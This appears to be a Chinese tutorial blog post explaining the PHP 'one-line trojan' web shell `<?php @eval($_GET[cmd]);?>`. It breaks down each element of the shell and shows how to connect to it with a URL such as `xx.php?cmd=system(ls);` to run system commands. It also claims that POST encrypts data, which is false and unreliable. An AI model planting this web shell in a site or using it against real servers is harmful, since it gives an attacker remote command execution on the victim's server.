一句话木马详细解说

一句话木马

<?php  @eval($_GET[cmd]);?>
<?php
php文件头
?>
@
屏蔽错误
如果加上就是不显示错误信息
不然就会显示
Warning:.....
Warning:.....
Warning:.....
eval
这是一个函数它会把后面括号的代码当做php代码运行。
这是一个危险函数,一般网站会把它过滤屏蔽。
$
这是一个变量源名
GET
获取表单
POST
也是获取表单,不过它会进行加密。使别人无法看到。
cmd
一个参数,到时候连接时用的,可改。
有些情况下会用''
一般来说都是因为存在空格
<?php  @eval($_GET[cmd]);?>
总体的意思就是把()内的代码作为php代码执行,获取有关cmd参数的表单

连接一句话木马

xx.php?cmd=system(ls);
cmd参数就是[]里面的,可自定义
system一个系统函数执行系统命令
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值